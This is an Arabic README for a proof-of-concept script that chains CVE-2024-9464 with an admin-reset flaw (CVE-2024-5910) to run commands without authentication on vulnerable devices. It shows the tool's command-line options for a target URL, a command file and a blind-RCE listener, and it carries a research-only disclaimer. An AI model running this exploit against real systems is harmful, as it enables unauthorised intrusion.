
استغلال إثبات المفهوم لـ CVE-2024-9464
إثبات مفهوم لاستغلال ثغرة CVE-2024-9464 على الأجهزة المعرضة للخطر. يجمع هذا السكربت بين إعادة تعيين المسؤول في CVE-2024-5910 لتحقيق تنفيذ أوامر عشوائي "بدون مصادقة".
السبب الجذري ومؤشرات الاختراق متاحة هنا: https://www.horizon3.ai/attack-research/palo-alto-expedition-from-n-day-to-full-compromise/
% python3 CVE-2024-9464.py -h
usage: CVE-2024-9464.py [-h] -u URL -c CMD_FILE [-li LISTEN_IP] [-lp LISTEN_PORT]
options:
-h, --help show this help message and exit
-u URL, --url URL The URL of the target
-c CMD_FILE, --cmd_file CMD_FILE
The commands to execute blind
-li LISTEN_IP, --listen_ip LISTEN_IP
local IP to bind to
-lp LISTEN_PORT, --listen_port LISTEN_PORT
local HTTP port to bind to, for blind RCE mode
تم إنشاء هذا البرنامج لأغراض البحث الأكاديمي وتطوير تقنيات دفاعية فعّالة فقط، وليس الغرض منه استخدامه لمهاجمة الأنظمة إلا في الحالات المصرّح بها صراحةً. لا يتحمّل القائمون على المشروع أي مسؤولية عن إساءة استخدام البرنامج. استخدمه بمسؤولية.